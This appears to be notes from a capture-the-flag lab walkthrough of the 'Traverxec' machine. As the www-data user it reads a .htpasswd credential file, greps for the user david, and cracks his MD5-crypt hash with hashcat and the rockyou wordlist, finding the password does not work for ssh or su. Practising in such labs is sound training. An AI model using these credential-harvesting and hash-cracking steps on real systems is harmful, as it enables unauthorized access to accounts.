3 box enum
PEAS
[+] Sudo version
Sudo version 1.8.27
[+] Hostname, hosts and DNS
traverxec
traverxec.1 traverxec.htb
[+] Readable hidden interesting files
Reading /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
www-data@traverxec:/var/nostromo/conf$
grep -rnw . -ie david --color=always 2>/dev/null
<f$ grep -rnw . -ie david --color=always 2>/dev/null
./.htpasswd:1: david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
./nhttpd.conf:5: serveradmin david@traverxec.htb
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Craching with hashcat
$ hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
Tried ssh and su with david:Nowonly4me
Not working
Last updated